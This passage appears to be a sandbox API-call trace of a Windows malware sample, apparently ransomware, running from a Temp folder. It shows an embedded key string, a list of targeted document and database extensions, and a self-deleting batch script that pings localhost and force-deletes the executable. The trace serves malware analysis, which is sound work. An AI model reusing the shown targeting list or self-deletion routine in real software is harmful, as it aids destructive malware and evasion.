(hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0098.089] LockResource (hResData=0x516f58) returned 0x516f58 [0098.089] FreeResource (hResData=0x516f58) returned 0 [0098.089] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.089] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.089] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.089] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15250b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x15250b0, cbMultiByte=38, lpWideCharStr=0x151de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.089] FreeResource (hResData=0x50d64c) returned 0 [0098.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x15250b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] GetCurrentThreadId () returned 0xbc0 [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0098.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b4258, cbMultiByte=97, lpWideCharStr=0x1482ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0098.090] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0098.090] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0098.090] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0098.090] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x1500df0, dwCreationFlags=0x4, lpThreadId=0x151dd84 | out: lpThreadId=0x151dd84*=0xbdc) returned 0xb8 [0098.090] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0098.090] ResumeThread (hThread=0xb8) returned 0x1 [0098.090] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0098.320] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.321] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0098.321] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0098.321] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0098.321] LockResource (hResData=0x5187d4) returned 0x5187d4 [0098.321] FreeResource (hResData=0x5187d4) returned 0 [0098.321] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.321] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.321] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.321] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525120, cbMultiByte=38, lpWideCharStr=0x151df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.321] FreeResource (hResData=0x50d64c) returned 0 [0098.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1525124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.321] GetCurrentThreadId () returned 0xbc0 [0098.321] GetCurrentThreadId () returned 0xbc0 [0098.321] GetCurrentThreadId () returned 0xbc0 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x151de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x151de48, cbMultiByte=83, lpWideCharStr=0x14b012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0098.321] GetTickCount () returned 0x237b2 [0098.321] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15511021906) returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Q畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Q畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Z畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="A畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="K畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="k畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="L畔﮴\x12\x1c翻") returned 1 [0098.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="Z畔﮴\x12\x1c翻") returned 1 [0098.321] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0098.321] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0098.321] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpszShortPath=0x14bc65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe") returned 0x30 [0098.321] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0098.321] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0098.322] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0098.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0098.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0098.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x149fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0098.370] WriteFile (in: hFile=0xe8, lpBuffer=0x149fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x149fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0098.371] CloseHandle (hObject=0xe8) returned 1 [0098.372] GetCurrentThreadId () returned 0xbc0 [0098.372] GetCurrentThreadId () returned 0xbc0 [0098.372] GetCurrentThreadId () returned 0xbc0 [0098.372] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xbe8, dwThreadId=0xbec)) returned 1 [0098.469] CloseHandle (hObject=0xec) returned 1 [0098.469] CloseHandle (hObject=0xe8) returned 1 [0098.469] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.469] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] GetCurrentThreadId () returned 0xbc0 [0098.470] WSACleanup () returned 0 [0098.713] FreeLibrary (hLibModule=0x77380000) returned 1 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentProcess () returned 0xffffffff [0098.713] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0098.713] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] ResetEvent (hEvent=0x88) returned 1 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] ResetEvent (hEvent=0x88) returned 1 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.713] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] CloseHandle (hObject=0x88) returned 1 [0098.714] CloseHandle (hObject=0x8c) returned 1 [0098.714] CloseHandle (hObject=0x84) returned 1 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetCurrentThreadId () returned 0xbc0 [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.714] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 